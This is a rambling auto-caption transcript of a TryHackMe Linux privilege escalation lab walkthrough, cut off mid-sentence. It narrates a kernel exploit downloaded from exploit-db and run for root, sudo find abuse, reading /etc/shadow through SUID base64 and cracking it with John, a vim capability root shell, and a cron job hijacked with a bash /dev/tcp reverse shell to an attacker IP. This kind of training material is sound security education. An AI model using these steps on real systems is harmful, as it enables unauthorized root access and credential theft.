Try Hack Me : Linux PrivEsc

Video Statistics and Information

Video

Captions Word Cloud

Reddit Comments

Captions

all right what's up guys so today we're doing linux privilege escalation i'm going to tell you guys right now this box is very long um this is probably going to be a very long video i was going to split it up and decided i don't want to do that i want you guys to be able to just find it and go through if you if you want um i'll tell you i'm not gonna cover every single thing as in depth as i usually do because otherwise this box would take probably two hours to finish um on video now first thing what is privilege escalation privilege escalation is simply when we get a foothold in typically on a pen test specifically you're not going to get an admin account first try you're going to get a lower lend account and you need to elevate that to an admin account or or an account that has privileges that you need to access what you're trying to get so that's what it is i'm not going to dive into it whatever they're saying um so here this is exactly what they're saying here's the things you can do when you get an admin account you can reset password so you have um you know an account that you can always access bypassing access controls editing the configurations enabling persistence that's huge so that you don't lose access things like that that's the type of stuff that we're going to be or that you would be doing once you took over the admin account now i will tell you um privilege escalation is not the same as taking it taking a foothold in a network or anything like that privilege escalation is more um it's more of a feel thing like you're you're gonna try things but it's not necessarily a one-shoe fits-all type thing you're not gonna be like okay well i did this last time so it works over here it's not gonna be like that you're gonna have to mix and match you're gonna have to play with things and uh i think they did a good job on this um but there are some gotchas on this that i am going to cover um i believe i already have this machine started i'm not sure why that is another problem with this box i keep having these machines mess up with me on me so okay it says it's good we'll see um one thing i'll tell you guys one of the gotchas i i found using the try hack me labs is that i always ssh into them because if i switch back and forth to these boxes it logs me out every single time which really ruins reverse shells and things like that if you're constantly logging me out so i ssh into them every time you don't have to i'm just telling you if you're having issues try sshing into okay so first thing enumeration so we've covered a lot of this so i'm gonna go through this fast so the host name if you type hostname command you're gonna get the hostname now that might not be very useful to some people right but as you will see here if we get ssh into and you notice every time it's going to be karen password one is going to be the actual um the actual login until the final box so we're going to do 10 10 199 116. yes and then password one every single time all right so now you'll notice if i do hostname it's actually a little bit helpful here because we do get wade 7363 might not seem helpful but we probably have another username or user account we probably know there's a wade somewhere involved in this now there might not be it could just be whatever but it's just sometimes you'll get things like this like ubuntu blah blah and that alone gives us information on what kind of operating system it is so here you name attack a and you see we're getting not only the host name here but you're also getting linux the version number things like that here the proc file system this is going to tell you information about it too you can just cat it so look at it proc version and you see you just get a little bit more information on it cool awesome good to know um the etsy issue files same thing you can see here a little bit more of a simplistic view all right now ps command that's going to show you the processes that are running if you do ps aux that's going to show you processes that are running on every user so not only um if you wanted to if you're just checking to see what processes are running you also will get to see some users that you didn't know about so like you'll see root obviously um let's see some of these are root kit right there um some of these are service accounts if you're not familiar with those are i'm not gonna dive into them we don't have time on this but basically meaning that they're not actually being used by somebody they're being used by services so all right that's some of the things you can do to actually get some information now emv is environmental variables so what you're seeing here is you're actually seeing like when you type shell you're it's going to bin shell which is the bash or no it's actually just the regular shell not the bash shell excuse me um so present working directory it you can see it's that's what it currently is set these are variables that you could set change do anything with and then every time you type that so like let's say instead of using nmap you wanted it to just be in you could have an a variable that says nmap here and then points to nmap and it would just be whatever you put that's what a variable is this is a shortcut in a sense um pseudo l this is important pseudo l will tell you right here pseudo password for karen would type it in boom sorry can't use it so sudo l will tell you if you can use sudo and what you can use it on um karen she can't use it she sucks we gotta figure it out everyone knows karen's are the ones that complain so we don't wanna we wanna switch to someone else we don't want her um all right so one of the common commands using linux is ls obviously we know that again i'm not going to dive into it id this can provide general overview of users privileges and group memberships so if you type id it's the same as if you looked at the shadow file or the or i mean the password file you're going to get their gr user ids and things um you can see here boom there's her user she belongs to her own groups in linux if every time you if you don't have a group you just belong to your own you create your own so there's no groups is basically what that's telling us cool um all right now here's the etsy password file the same thing you're going to get there but you're going to get it for all users we're not going to dive into that yet because we're gonna use it a lot history if you log into a fresh box you can type history and see what the last commands were written um i have config that's just information from the network netstat same thing these are important because um especially right here where let's see um if you're looking at netstat and you're looking at listening ports and things like that you can read through this and do it but it's important to know what what you're looking at and how to do it because you can actually map a network a little bit based on these netstat meaning if i do netstat and i look at this i know okay that's their gateway because they're hitting that this is a connection they have with another server internally so on so forth and i'm seeing the connections and i can map what i'm where i'm going to start traversing to on a pen test the fine command find very common this is one we're going to use all day long today um actually we're going to probably use this one right here but either way um so the find commands just helps you find things you can see that you can find files specifically with certain permissions um writeable files this is another thing you guys are going to see a lot today this two dev null all that is is telling errors to go to the dev null folder which is just not to be seen get rid of them if you don't do that every time you do something as a lower end user and you get file permission denied which will be thousands and thousands of them it'll pop up on the screen if you send it to devnull you won't get that you won't see them so that's that's important um here you go so find command on the root directory permissions and here's the permissions that you wanna they're looking for and then you can see the two dev null so the two dev null again all it does is get rid of the errors just keep that in mind you're gonna want that um okay so to find development tools so you can see it's important to know what languages are on the actual machine the reason that's important is simple if i'm trying to run a python script on their machine and they don't have python installed it's not going to work right all right so here's what is the hostname of the target system so if you remember we already did this we typed hostname and we got wade 7363 what is the linux kernel version of the target system and you can see right here if we scroll up this is walking us through it um the guide so i actually recommend as you're going through this guide typing them out so that way you're um genuinely finding this information because otherwise you're just going to be kind of going back and forth up and down so you type you name a and you can see we get the 3.13024 generic it's down here all right now what linux is this now this one you're gonna you're gonna think that you probably can find it because it's ubuntu right there but they're looking for something specific and what they're looking for is you two run uh i think the etsy issue they want you to open that so etsy issue and you see you get the ubuntu 1404 lts that's the specific answer they're looking for what version of python language is installed all you got to do now they want you to do this find name python um if you just type python i'll tell you right now it'll pop up and you'll see the python version right there that's true with most python uh versions i i the only reason i don't say all is because maybe some older ones that i i don't mess with don't do that but um so now here's here's you're probably wondering like okay so we're getting information but what are we doing with it here's what you're doing your what vulnerability seems to affect the kernel enter a cve number that's the cve number what they're wanting you to do is take that kernel version okay and take the actual kernel and look basically do some research and find what vulnerability this is now all you got to do is take the kernel to to do where was it i know we just had it we could even probably just do this and copy and we don't have to do that we can just do ubuntu ubuntu 14.04 and anytime you see eol end of life it's pretty good sign there's a there's something wrong so we'll just say cbe um yeah whatever um all right so we can't let's see and there's a specific one if you look on here there's a specific we'll go up here and type out to get this specific um thing here you can see here this is you can type this specific uh version of it 3.13.0 all right you can see right there is our exploit all right and here is the cve number so just a quick google search find that um you guys can mess around there's probably a lot of vulnerabilities in this to be honest but this is the big one that they were looking for and you're probably looking at this and going uh what that's fine this is the actual payload this is what you're gonna be um using if you will um so as we're going down all right so now it's asking us scroll down here all right so we've already done that for some reason i was thinking they wanted us to take over the machine but they don't even want us to do that on this one they just want to see it perfect okay i'm just going to let you guys know i'm going to terminate the machines and start the next ones every time or try to before i even start talking about what's next because this like i said it's going to be a while um we're at 12 minutes it seems like i'm going real fast but there's it starts getting a little bit harder um so automated enumeration tools you'll see these a lot if you guys aren't familiar with these that's okay there's lin peas there's also wind peas if you're not familiar win peas is just a windows version of lin peas linden newm linux x-play suggester smart numeration privilege ball ball okay these are all different all different uh things but basically what they do is they run these checks on on the machine okay and they tell you uh this is vulnerable this is one or whatever and they're doing what we're doing manually throughout this bot these boxes but they're doing it automatically it's a really good thing to do just keep in mind that these are not perfect they will give you false negatives false positives and they will have you sometimes chasing uh rabbit holes that don't exist so keep that in mind all right my dog just kind of freaked out for a sec um so here it says install and try a few i do recommend that you try them um lin pieces and win piece is very good you'll see that a lot in in some ctfs and stuff all right so now we got privilege escalation kernel exploits so okay so they actually do have us do the previous box which i thought they did i couldn't remember um all right so we got kernel exploits i'm just trying to keep up with what i've got over here so that way i've got all the commands and things because otherwise i'd be here all day getting them all written back down um all right so once this starts we can actually go here back to our box because like i said i try to ssh into all the boxes i try not to um i try not to open them on that because every time i switch back or click off of it it will actually kick me off and that might not be true for you guys that's just what i've found that sometimes i'll come back and it's kicked me off so i just prefer this way okay so we're in again as karen these now here it's telling us find and use the appropriate kernel exploit to gain root privileges now here it's telling you some hints and notes about researching these are good research notes this is a big one being too specific about the kernel version sometimes if you're searching for um something and you're like version 1.2.2.3.4. what you know it's like that's such a specific patch that someone would on google would have had to put that key in there for you to find it where if you just put like linux 14 you know what i mean um they then a lot of vulnerabilities will pop up and you can see dive in a little bit deeper um here it's telling you here you could also use um tools like uh les or lynn p's or any of that um do x-plays require further interaction once they're run read all comments and instructions that's important so when you're on github or something like that and you're downloading these basically make sure you know what you're doing because if you don't you might get halfway through it and go it's not working but there's required steps that you're not doing um all right so now here this is a big one you're gonna see me use this a lot i i like simple servers so for me it's something i use all the time um and i've used it in the real world all the time so keep that in mind um all right so here we go we know we know the um cbe number so we don't have to worry about that and the only reason i say that is because the the it kind of gives it to you if if you get what i'm saying you could sit there and search for it but look at the hint look for the exploit codes related to the cbe you found in the previous tasks so you kind of know what you're looking for okay all right so now if we go to here and i'm just going to give this to you guys but if you did research you guys would find this anyway um if it runs one thing i've noticed the attack box also isn't running very fast today um i don't know why that is but whatever so i have www.exploit you know exploit db just like normal now the exploit three seven two nine two that's the one we're looking for all right boom all right so now sure whatever this is a attack machine all right so here's the code that we actually want so keep that in mind um you can download it if you wanted to you can do whatever you want to it my dog just scared the other dog and you can see right here here's copy so we copied it we could download it whatever you want to do i personally download it only because sometimes you can mess up and you can actually accidentally like copy a space or something and then be chasing that down forever and that's really frustrating so personally i download it um now a lot of you may wonder or may ask okay well i've got the download right so what do we do now so here's what here's the problem right so we have the download but we need it onto our our target machine because this is going to do the exploit for us so what we need to do is we need to change to downloads okay and it should be in there and it's not so now we got to figure out where the heck it downloaded it maybe there we go okay so it's okay so it's actually in root it's not they don't put it in downloads on this machine okay cool even easier so we'll go back to root and you can see it's right there three seven two nine twos dot c that's super easy that helps us out a lot so now all we got to do is do our python three tech m http.server okay and then you gotta put whatever um port you wanna do i you guys will notice um there's a lot of people that do like eight eight eight six six six six whatever i almost always do one two three four um doesn't really matter i just i've always done it um now you just go here and you'll say wget which is just reach out to the web and get whatever i'm telling it to and then we'll say http um to do and we we know our ip up here if you're on the attack box it's always up here that's a really good tip if you guys never see it 1010 111.32 and then you've got to make sure you tell it where you're trying to get it from because one thing i see a lot happen is they put the the http down here but they don't put the port that they're actually serving it on which is for me one two three four and then what do we want and it's i gotta remember the exact name here three seven two and that should do it cannot write okay so a perfect example here um let me show you here here's one of the problems so the directory that we're in is uh i think we're in yeah we're just in root here we need to copy this to something we have permission to um so i usually just use the temp folder if i can so cd temp and you can't do that so wget http 10.10.111.32 one two three four three seven two nine two dot c and you can see there it is now it's in there so all that happened there guys if you don't understand is we're in the root directory because we're not root we're not an admin we can't write in the root directory so we had to find one that we could write in you can actually find that up here they explained it a little bit better but i just went to the temp directory because typically temporary directory can be written to and now we have it so now even though we have it we have to look here ls tac la and we see that okay so 37292 we can read and write it but we can't execute it so we need to change that right because if we if we just have it sitting there nothing's gonna happen so first things first we gotta compile it because it's a compiled language so that's where we know that this this machine actually has the gcc tool on it which is perfect for us so now three seven two nine two two nine two dot c so that's just telling uh telling it to compile it using the uh compiler code okay and it's gonna actually compile it and then what output do we want and we're just gonna say um cve we don't need it to be anything crazy okay and it's gonna compile boom boom boom boom and you can see now if we hit ls there it is now we have to change the permissions if you don't change permissions all you'll have is read and write access to it so change mod and i always do 777 on these boxes because yes in a real scenario i probably wouldn't do that on my own machine because it makes me vulnerable i don't care about these boxes so 777 gives all permissions to it and we're going to say cbe boom now we should be able to when we hit ls there's our cve we should be able to run cbe all right now we type who am i because it mounted and now we're root look at that so now we have root access now we have access to everything so now it says what is the content of flag one dot txt okay so what do we do we just say find name flag1.txt and you're going to see a pattern here all right if i could and you can't do that drives me nuts but anyway um i'll show you guys you're gonna see a pattern here and the the pattern is pretty easy the pattern is almost all the flags are gonna be in the user or the home directory so if i find and i do it now with using looking through the root directory which is what i didn't do on the last one flag one dot txt it'll find it home map okay i'm not gonna sit here and wait for matt so we're gonna say cd home mat cat flag one dot txt and there you go there's our flag so all i did there was looked for it using the find command every one of them's gonna be in in a home users directory i'll just tell you that now to save you some time looking for them they're not very hard to find but just to let you know so now we need to terminate that machine start this machine and start talking about pseudo ex escalation so that was kernel exploits so what that means is that was an exploit actually a flaw in the system okay that's a flaw in the actual build of the os okay that's totally different than a flaw in a configuration because a flaw in configuration means that somebody didn't either didn't secure it or they improperly secured it meaning they left like for instance if someone left the root user's admin password as admin right that's a configuration issue that the ubuntu didn't make that mistake ubuntu didn't mess up and make a flawed system the system administrator who designed it made a flawed system so keep that in mind there is a difference and it's important that you know the two okay so now we're looking at privilege escalation pseudo we gotta wait until we see it so these are basically if you guys aren't familiar when you use sudo on linux it gives you root access so that's what we're trying to take advantage of is what can we sudo meaning what can we take advantage of that will give us root access so now once again we ssh karen at 10.10.255. 196. boom maybe there we go password one hopefully that worked sometimes this thing lags and it misses a letter or two um yeah it didn't work i didn't think it did all right so now this gtfo bins is a huge resource that you're gonna you're going to want to use constantly not just here but we'll go ahead and open that in a new tab and just keep it there for now thank you for finally logging me in all right so first thing if you remember we tried this earlier and we couldn't do anything but here if we type sudo l it looks like here are the three commands that we can act karen can actually run using sudo meaning as root so she can actually run the find command that's important because like right here we could actually just find if we wanted to the flag now we couldn't read it using the find command yet but we could find it because we're allowed to run find as root so keep that in mind that's kind of kind of a big deal so now it's going to explain some more stuff here you can see here it's explaining the preload option the ld preload on some systems you may see the ld preload environment it allows it to use shared libraries and then allows you to change that um that's great i like that they explain it that's not what we're doing here because that's not what the flaw here in the system is so keep that in mind um all right just trying to find where i am okay so now let's first things first let's go ahead and say sudo find right because all we want to do is see if we can find the flag first because i think it's flag two okay flag two yep so find name and you're gonna see what what we mean by this so sudo find and then we're going to say name flag2.txt okay all right it searches through everything here and it may not find it if it doesn't oh well um we know where it is we know it's in the um users directory okay but the point is that we can run sudo on find i'm not going to wait for this we can run pseudo on find and it doesn't stop us so that's important because you can actually use so gtfo bins you go here and you type in find and you say sudo because that's the option that we have and look at this this will give us a shell right there find so i'm going to move that over here so i can copy and copy it okay so sudo okay actually we'll just do so find dot exec slash bin sh for shell all right and then quit now this what this is is using the find command to escalate privileges okay so now you notice i'm still karen and of course you can't do that so now pseudo meaning i want to run it as uh as root we're going to go ahead and do it this way okay and boom now if i type who am i if i can spell who am i now i'm root so look at that so gtfo bins is actually a great tool that lets you look for flaws if you will so let's say you can use any of these commands like apt and you're allowed to sudo it well they'll give you a way to take advantage of that so gtfo bin is a great resource i've i've used it for years i recommend it so now how many programs can the user karen run on the target system with pseudo rights well if we look here it's nano less and find so three what's the contents of flag.flag2.txt well if we look at where we're at and we say okay cda home ls cd ubuntu there's our flag boom there's our flag okay now how would you use nmap to spawn a root shell if the user had sudo writes on nmap so what that mean what they're asking here is they want you to go onto gtfo bins and they want you to look at nmap and if you had pseudo rights and they want you to tell them this right here sudo and map interactive that's what they're looking for and the reason they're looking for that is because they want to see if you understand how gtfo bins works and if you know how to use it all right so now what is the hash of frank's password so this is just simply they want you to go in and they want you to say okay cat etsy shadow there's frank's hash copy it over and boom you've got it now this is where we're gonna start diving in a little deeper because we're gonna actually start taking advantage of some of these things meaning that we're going to we're gonna actually start cracking some passwords too with this all right so here we go all right so now su id so there's a difference between sudo and suid now you'll notice on here there's su id on these as well on gtfo bins so it's a good resource but don't think they're the same thing okay so sudo means that you can run that as root they gave you permission they said okay you can run it as root whatever right now suid is a bit that's turned on on these i thought there was a picture of it somewhere here um there is somewhere all right i thought there was so basically it's a permission that's set on these so you can see here they're looking for and that's what we're going to do file with permission set at zero four zero zero zero now what that means is they're looking for a file that has this little s i don't know if you guys can see that but there's a rw for read write then there's that s that's the suid bit what that means is and you can see here they'll tell you here uh but basically that's a that's a set user identification that means that the whoever runs that uses it whatever it shows here the file is executed permission of the file owner or group meaning if the see how root owns these root owns them so it's ran at whatever access the owner is so not whatever access you have not if you sudo it whatever access the owner has so that's important that we look for that because if someone let's say someone's just doing all their administration as root which they don't recommend you do this is why it can be a problem because if you're sitting there creating scripts as root and someone can edit that script because you have permissions messed up that means they can change that script to whatever they want and use the suid on it if you have it set now what you could could do is you could set the suid on your machine i mean on your file right as a regular user and then you could edit it with root but keep the owner as the lower end guy and then you wouldn't have to worry but if you create it as root and you have that su id set you're in trouble all right so sudo i don't know why type sudo ssh karen at 10.10.74.94 yes and you guys can see how this is starting to get longer but it's very good information okay very good all right so first thing we're going to do we're going to type that exact command find so we're gonna say find and then that little that little forward slash that's saying root directory is what it's saying type f permissions we want zero four zero zero zero ls then we want to send all the errors to dev no meaning we don't want to see the errors because if we sit there and look at the errors we're going to sit there all day long all right here we go so you can see we're starting to get a few we're getting a decent amount but are any of them useful and i can look so we have ping boom boom mount open ssh okay do we have anything crazy here that we oh base64 so base64 is a tool that lets us base 64 in code but let's see something interesting here so since we can base 64 in code have we tried let's try this so we want a base64 because base64 is now going to be ran as the root permission if that makes sense to you guys because root owns it and it has that set to where it runs as the root okay so what we're going to do base 64. if you guys aren't familiar with base64 all it is is literally a tool that lets you base64 in code okay and so what we can do is we can do base64 and we can simply say our etsy shadow file which has our we're gonna do the password file first just because i uh we need them both so etsy password and then we're going to put a pipe and then we're going to say base64 again but now we want to decode it okay now the reason we're doing this it sounds silly right like why would we encode it and then decode it because this is ran with root permissions and we can't read these files so if we do this it opens it and codes it and then decodes it but we took advantage of it and let it made it print it out for us even though we don't have permission to do this so now we're going to go ahead and copy all this copy cancel paste file save and i'll show you what we're doing here uh we'll go ahead and just put them on documents doesn't really matter and we'll just name this password dot txt you can name it whatever you want okay now we'll go ahead and new file exit that one now we're gonna do the exact same thing base64 and if this doesn't make sense to you guys all it is is the base64 is literally get has permission to you to run this as root so it has permission to read files that we can't normally read and the shadow file is one of them so base64 etsy shadow file now if we just did the base64 without putting the pipe and then the decode basically what would happen is it would just be all encoded we wouldn't be able to see it all right so here's the oh be quiet i don't know what your deal is dude i don't know what the hell his problem is um all right so knock it off these guys are freaking going nuts all right so now if we open this paste it save it maybe um then we go to documents because we want in the same one oh i guess i put it in the root directory i didn't realize that that's all right and we'll say shadow dot txt all right so you might wonder why i put them in the same directory it's because we're gonna actually um this can be stopped we did that earlier um it's because i actually wanted them where i could access them so there's passwords dot tx or password.txt and shadow.txt so if you guys have never used john the ripper um you need the password file and the shadow file you just have to have them so it can put them together um but basically what you're gonna do from here is you're just gonna do what's called unshadow and you're gonna see it will put them together so password.txt and the shadow.txt and then from there we'll just put it in um cracked.txt you can put it whatever you want all right so now when we hit it that's that cracked dot txt sitting there and then now we're going to use the actual john the ripper if you guys haven't used john ripper it's a great tool you have to say john and then specify word list that we're going to use word list and it's equal to we're going to use the etsy and then the or the i'm sorry the etsy the user share word list rock you if you guys aren't familiar the rocky.txt comes on all cali boxes and there you go and then you just have to specify which one you want to use so we want to use the cracked dot txt and we hit enter and you can see it's going to run and it's going to try and crack those passwords that we just gave it now you can see here it found karen's and it found user 2. so which user shares the name of a great comic book writer jerry conway right there boom what is the password of user 2 password one and in a real situation these aren't going to crack that fast just heads up it's because they're so easy to crack now was the content of flag 3.txt file if you guys just log in as one of these users run it look for it it'll be in there in their home directory that's where that's at okay i'm not i'm gonna make you guys challenge just a little bit because like i said this is a long box and i want to see you guys do some stuff right i don't want to do everything for you all right so that's that's a fun one because we just cracked our first passwords that that i think we've done on the junior pen testing i mean it's been a long path so i don't remember maybe we did use john the ripper on something but i don't remember using john the ripper all right so now all right so now capabilities again another option here in gtfo bins capabilities that's what they're called okay so keep that in mind when you're looking you you need to know what the difference is so here you go so you can see here we another method blah blah blah increase privilege level capabilities capabilities help manage privileges at a more granular level so again it's managing um privileges but this helps out the admins anytime an admin is i don't say they're taking a shortcut right but if it's helping them it's more likely that they will slowly slip and do it incorrectly because it's already being easier for them and they'll keep getting easier that's not to say that's true on everything i'm just saying in my experience um all right so you can say we can use the get cap tool to list enabled capabilities so we can actually first ssh into it obviously ssh karen at 10.10.139.169 yes password one boom and i'm not sure why they um why they make you start every single new box i mean maybe they just didn't want to have all different vulnerabilities on one box but uh either way so let's see if the system administrator does not want to give this user higher privileges which is pretty fair right they can change the capabilities of the binary so what that means is the binary get would get through its task without needing higher higher privileged users so let's say you need to take backups of your stuff every day that backup script might be able to run as root no matter who runs it because it's only doing a backup right that's basically what we're looking at here so get cat attack r and what we're looking for is we're looking for things that have op okay and you can see here this is what it looks like when you don't do the dev2 and i'm gonna stop it because it's just gonna go all day um but that's what it looks like so you can see here git cap this will generate a huge amount of errors and right there they said it and we still didn't do it or i should say i didn't do it so get cap attack r then the two dev null now when you do it it should look a little bit better for you my dogs are going nuts um all right so please note that neither vim nor its copy has the suid spit set okay so what that means is what they're trying to say here is the example they're using do you want damp the example they're using will look like it's doing the same thing that uh that the suid is doing but it's not because you can look and see that doesn't have the suid bit set so that's what they're saying they're saying notice that it doesn't have that set but it's still doing the same thing because it has capabilities all right so this will launch okay so this is an example that they're going to use and then we're going to go ahead and do the same thing but we've got to figure out what they what which one excuse me that they're looking for now if you look it's slowly going if it'll freaking go it's it's kind of frustrating because i know which one we need and i'm waiting for it to pop up but it's not popping up okay there's vim so right there vim if you guys don't know what vim is it's an i don't want to say old school because it's it's just been around a long time it's still a good text editor but it's a it's a terminal text editor so it's very good you just have to um i recommend pulling up a vim cheat sheet if you aren't familiar okay so what we're going to do we're going to go to vim okay or go to gtfo bins excuse me vim and then we want capabilities okay okay so it says here if you do this it should work right that's basically what they're saying now i will tell you and it says it right here if you have pi python 3 you need to change that well we do have python 3. another thing i'll tell you i'm going to pull this over and type it out because you can't copy and paste in between so that's all right so we'll go ahead and do them pi now keep in mind you need pi 3 here because the attack box does have pi three import os now if you guys aren't familiar with what's going on these are binaries that someone has already designed specifically for this task because it's a known thing that if vim has the capability it can do this and you'll notice what it's doing is it's going to spawn a shell for us and you if you guys are familiar with um with reading code at all or anything like that even if you're not really that familiar with it you can kind of get the gist of it just by reading it and what i mean by that is you can actually see it these dogs are going to drive me nuts all right sorry those dogs are freaking driving nuts all right so you can actually um follow along with the code and look at it kind of see what what's going on all right so we're going to hit this hopefully it works let's see what happens all right now we type who am i and we're root it's that easy guys now it's not going to always be that easy but what it is is it's taking advantage of a capability that vim has which is to run as root by itself that's a capability not a set permission or anything it's called a capability so keep in mind they're different because the reason i say that and i emphasize it is because if you are searching for suids or pseudo or anything like that you're not going to find a capability you have to search for it okay so now complete the task described above on the target system we did that how many binaries have the capability if we go back we can see that it actually popped up it was six um what other binary can be used through this capability vue is the other one there was another one there and then what's the contents of the flag so now we just need to do cd home i don't know who it is okay cd ubuntu and then catflag4.txt all right and there you go now keep in mind you can actually um instead of spawning a shell you can change that command to just do the cat flag 4 if you wanted to um you can do all kinds of stuff so keep keep that thing in mind that you don't always have to spawn a shell um but it's cool to do because then you have the machine taken over all right chrome jobs this is one in my opinion you're going to run into on ctfs a decent amount um you may not but i've ran into them a decent amount but a chrome tab what is it chrome tab is the same thing on if you guys have ever gone on windows and i'm sure we're gonna cover these on windows um in the next box but if you guys have ever gone on windows and you've had a scheduled task it's the same thing a chrome tab is a scheduled task on the machine so let me give you guys a scenario which is basically what we're gonna do um so you have a scenario you have a script that runs backups every night right it runs backups at midnight and that script all it says is hey copy the backups to this server right cool sounds pretty you know media doesn't sound like anything can happen you know whatever but it runs using chrome tabs and it runs every night well that script that runs every night if it is editable meaning i as a low end user can edit that script i can just set that or change that script to give me a reverse shell that night at midnight because it's already set to run so it's just going to the other thing to keep in mind is even if it's not editable if it's if you don't configure it correctly meaning you don't um keep up on maintenance meaning you don't delete them things like that so i'll show you what i mean by that so first thing ssh karen you're killing me here karen at 10.10.60.142 yes all right now here there's some gotchas in this one too that i'm gonna make sure i cover for you guys so that way you guys aren't sitting here for hours trying to figure it out okay so first thing first you gotta read the etsy chrome tab file to see them okay all right we've got four things running and it looks like they run every minute which the box did that for us that wouldn't actually happen okay i'll just tell you that one thing to keep in mind too when we're setting up a reverse shell we need to have our listener up so netcat lvnp v and lp whatever you want to put um i just do one two three four like i said and it'll listen for me i just i just do that get that out of the way so the one i like to do here because i would normally do this test.pie reason because it's in the temporary file people aren't going to check that the one they probably want us to do is the care and backup so that's what we're going to do now if we're in the room directory or the home directory the backup.sh is right there okay now if we change directories to temp and we list it you notice the test.pi is not there this is important because what it is is someone messed up and they didn't take this out when the script got deleted so that means i could create a script named test.pi in the temp directory and it will run for me okay and we'll go ahead and do that since we just changed into the so first thing i'm going to do is vim so we're going to use vim and then i'm going to say test dot pi so i'm going to create this file okay and then if you don't know vim just look up a cheat sheet i'm telling you right now so eyes insert and we're going to say we want to do bin bash now if i remember correctly they actually give you i think they give you a custom they gave you somewhere where these existed this script maybe not but anyway um if you guys are wondering you can go to pen test monkey and you can just do reverse shell these are great resource here's the here's what we're going to run the bash that's all it is it's that simple now i've got to bring it over here so i can type it so there's the bin bash you have to specify what you're doing and then we're going to say bash attack i we're gonna say and then we're gonna say dev tcp now this is to reach out to the reverse shell so we need our ip which is 10.10. one okay and then the port which we did one two three four and then we're gonna say and one okay so that's all you gotta do and then to save it if you don't know bit or if you don't know vim again it's escape wq to save it okay i know it doesn't make any sense i'll never understand it but that's the case okay so now that's supposed to run every every minute now we still have to change things on it so number one it has to have the right permissions okay that's just necessary so change mod and we're gonna say test dot pi okay now let's look at it all right now here's the only thing i don't like it's got the karen as the owner i want to change the owner and i want to let me get rid of this here i want to change the owner and i want root root for test dot pi okay so it's actually not letting us which is fine if it doesn't work we'll have to do the one in in her home directory which we'll go ahead and do that one as well and the reason for that is you notice when you're looking at the cron tab it's looking for one owned by root okay so what we're gonna do is we're just gonna say cd home and then we're going to vim the bash what is it oh backup excuse me backup.sh okay perfect and you can see they've already kind of got some stuff in here for us so we'll go ahead and get rid of all that you don't need it all right hit another space on them and then we'll just go ahead and change it right back to the way to what it was and that was [Music] and dev and if you notice guys i'm still looking at the actual script right i don't have this this specific bash reverse shell memorized i'd be surprised if people do um unless you're using it all the time which i'm not so keep in mind that it's okay to look things up it's not a sin to have cheat sheets all over the place um i know where where i used to work now i work at home so i can just have my notebooks and stuff but i use it where i used to work i used to have cheat sheets literally everywhere i would have them all over my desk i would have all kinds of stuff okay you can see i already had it um so even though i changed hers it actually ran and i already had the root shell here so we'll say who am i and that's from the temporary one that's from the temp file so you can see i i have it it's asking me how many user defined chrome jobs can you see on the target system and you can see if we go back there's four antivirus antivirus backup and test was the contents of the flag 5 so we'll go ahead and say cd home and we'll say cd ubuntu and i hate that you can't tab it all right and there's flag five dot txt there's our contents right there and we've got the contents all right what is matt's password so for matt's password guys i'm not gonna do it for you because i just in the presence of time i am going to tell you how to do it um so you guys can do this you guys have already seen me do this and you guys should have already done it yourself all you're going to do for matt's password you're going to open so you'll notice i'm going to lose this connection here you're going to open the the password file and the shadow file you're going to copy matt's pass matt's hash out of each of them okay just like we did with the whole file before but just mats you're gonna pull it out and then you're gonna save it as a password and a shadow and then you're gonna unshadow it to combine them and then you're gonna use john ripper the word list rocky.txt and you're gonna crack the hash i'm not gonna do that one for you guys the password is one two three four five six if that's all you want out of this i would prefer that you guys actually learned it but that's just me okay now we're diving into privilege escalation paths now hopefully so far you guys are with me because there's a lot of information thrown at you all right so now paths sorry that sounds weird why i'm saying that so first thing we got to do again ssh into it it'll tell us the thing here karen at 10.10.189.64. all right and they were for some reason denied it all right hopefully i uh started the right thing all right that was weird whatever maybe it wasn't up yet okay all right so what is a path first off so if you echo path you'll see that there's paths that you basically are defaulted to if you will um someone sets this your administrator and it's not you so echo it's a variable is what it is but this can be changed okay so keep that mind any variable can be changed but you can see here we have access to user local s been user local bin user blah blah blah so on so forth okay so if a folder for which your user has write permissions is located in the path meaning if any of these folders we can write to them then we can actually hijack an application to run a script meaning we can point our application to path and it will use that hopefully that makes sense you guys if it doesn't you guys can read a little bit more about it these ones are a little bit more complex than we have time to cover on just this little video um and when i say they're a little more complex they're not more complex they're just if you're not familiar with linux you're not going to understand it right away that's the only difference so first thing we need to find out is what folders are located under path which we've got here and keep in mind that we can actually modify this we can add them so does your current user have right privileges for any of these folders so some of these things this is what we got to do we've got to find the right privileges to see can we write to any of these because if we can't write to them then we don't have the vulnerability right so first things we're going to do we already searched for the path right we've already figured that out and here's our list of paths so now we need to search for writable folders so we need to go ahead and say find writable okay it's important that you know that you're searching for writable um then you're going to say 2 dev null all that jazz right you don't want the uh all the errors you might want them i don't know all right now this part i'm just throwing in there for you to save you some time you don't have to do this but i'm going to go ahead and cut d which is deliminator and then we're going to say this is that's what we want to cut we want to cut it there okay and then we're going to say f and then we're going to say two three now you if you guys aren't familiar with this command that's okay this is just saving you time because you can do it um with just a regular find it just will take you a long time um so sort all right so this just given us a clean version of what it is okay you don't have to do this it's gonna take a sec because it's still processing a bunch of stuff okay so you can see that we're getting a lot of stuff right well the ones we're looking for is we're really looking for the user um let's see so we're looking for something that basically is out of the norm i guess if you will so like right here it's very weird that we have the home murdock why would we be able to write to murdoch's home folder right so that's weird so that right there tells me that we probably have you know because that's probably in our right access we'll go ahead and echo the path again to just see okay and mind you guys there's more searching going on typically in this but because i already know the answer it you know i'm gonna and it gives you the that same command right here and there you go boom boom boom okay and you can see here that from this let's see all right so we have like i said we have write permissions for his home folder which is again strange but now if we went into his folder we would find the flag uh because we have permissions to look into his folder obviously um so let's see here all right so there's the odd folder that's the answer exploit the path vulnerability to read the contents of the flag so what they want us to do is they want us to do this exact thing um you can see going to be pretty easy um give me a sec we'll go ahead and go through this i want to make sure that i'm not skipping steps for you guys because like that one i skipped and gave you a big command i want you to make sure you guys understand the process i know we're still we're an hour into this video but i want to make sure you guys understand it and it's not something that we're just completely you're just getting the answers from me if that makes sense um okay so we have the murdock he's killing it if we go to if we actually look at his home burdock you can see there's a test file and then there's a thm python file okay that's kind of weird so we what i'm going to do is i'm actually going to go into those files because i want to know what they are um so home murdock okay and if you do an ls la you can see that the test here is actually an executable so that's interesting so let's go ahead and run it it's a test what's it matter right so we're going to go ahead and run it we're just going to see what it does didn't mean to hit the second one okay so you notice right there it says th m not found so it's looking for a file named thm so that's very interesting because what that means is if we can put a file in its path which is hence this path if we can put a file there name thm it will run it because that's all it's looking for it doesn't know what that thm file is supposed to be it has no idea so we're going 